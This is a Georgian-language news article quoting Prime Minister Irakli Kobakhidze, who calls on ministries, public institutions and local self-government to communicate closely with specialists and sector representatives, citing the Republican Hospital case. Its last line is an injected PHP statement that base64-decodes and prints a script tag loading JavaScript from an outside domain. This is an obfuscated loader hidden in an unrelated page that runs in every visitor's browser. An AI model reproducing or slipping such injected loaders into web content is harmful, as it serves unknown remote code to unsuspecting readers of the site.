celsiusi
ავერსი საქკაბელი

ჩემი მოწოდებაა არა მარტო მინისტრების, არამედ საჯარო დაწესებულებების, თვითმმართველობის მიმართ, რომ ყველას უნდა ჰქონდეს ძალიან მჭიდრო კომუნიკაცია ადამიანებთან, დარგის წარმომადგენლებთან, ეს არის ყველაზე სათანადო გზა პრობლემების გადასაჭრელად, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი კობახიძემ განაცხადა.

როგორც კობახიძემ აღნიშნა, საქმე როდესაც ეხება დარგობრივ სამინისტროს, საჭიროა მაქსიმალურად მჭიდრო თანამშრომლობა, პირველ რიგში, დარგის სპეციალისტებთან და წარმომადგენლებთან.

„ჩემს სამთავრობო პროგრამაშიც ვისაუბრე იმაზე, რომ საჭიროა მაქსიმალურად მჭიდრო კომუნიკაცია, თანამშრომლობა, განსაკუთრებით დარგის წარმომადგენლებთან, სპეციალისტებთან. როცა საქმე გვაქვს დარგობრივ სამინისტროსთან, საჭიროა მაქსიმალურად მჭიდრო თანამშრომლობა, პირველ რიგში, დარგის სპეციალისტებთან, წარმომადგენლებთან. ამ თვალსაზრისით საჭიროა სწორი მიდგომა. მე არ მინდა შევიდე ნიუანსებში, რა დონეზე იყო ეს პრობლემა, ვისგან იყო ეს პრობლემა და ასე შემდეგ, მაგრამ, ფაქტია, დავინახეთ, რომ იგივე რესპუბლიკური საავადმყოფოს შემთხვევაში, იყო სხვა შემთხვევები, ასეთი კომუნიკაციის პრობლემა არსებობდა.

თქვენ ასევე ხედავდით, რომ ზუსტად ამ სექტორში არაერთი თხოვნა იყო იმასთან დაკავშირებით, მაგალითად, კონკრეტულ წარმომადგენლებს, სპეციალისტებს, პაციენტებს ჰქონოდათ შეხვედრა პრემიერთან. ასეთი საკითხები სამინისტროს დონეზე უნდა გვარდებოდეს, ასეთ საკითხებს არ სჭირდება უფრო მაღალ დონეზე ატანა, უფრო დაბალ დონეზე შესაძლებელია ამ საკითხების მოგვარება. აქ დავინახე მე პრობლემები, რომლებიც უნდა გამოსწორდეს არა მარტო ჯანდაცვის სფეროში, ყველა სფეროში. ეს იქნება ჩემი თხოვნა.

ჩემი მოწოდებაა, არა მარტო ყველა მინისტრის, ყველა საჯარო დაწესებულების, იგივე თვითმმართველობის მიმართ, ყველას უნდა ჰქონდეს ძალიან მჭიდრო თანამშრომლობა, კომუნიკაცია ადამიანებთან, დარგის წარმომადგენლებთან, ეს არის ყველაზე სათანადო გზა იმისთვის, რომ პრობლემები გადაიჭრას. მე პირადად როდესაც მქონდა შეხვედრა რესპუბლიკური საავადმყოფოს წარმომადგენლებთან, პერსონალთან, მოვიდა რვა ადამიანი, ინტელიგენტი ექიმი ხალხი, რომელსაც ჰქონდათ თვიანთი არგუმენტები. ასეთ არგუმენტებს სჭირდება მოსმენა და გათვალისწინება. არის შემთხვევები, როდესაც, მაგალითად, არასწორი პოზიციაა, თუნდაც დარგის წარმომადგენლების მხრიდან. აქ თავისი გადაწყვეტილება უნდა მიიღოს სახელმწიფომ, მაგრამ როდესაც მოდიან დარგის წარმომადგენლები, გისაბუთებენ, რომ რაღაცის გაკეთება შეიძლება სხვანაირად, უკეთესად, იქ საჭიროა ჯანსაღი მიდგომა, საჭიროა ამ ყველაფრის გათვალისწინება“, – განაცხადა ირაკლი კობახიძემ.

253
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");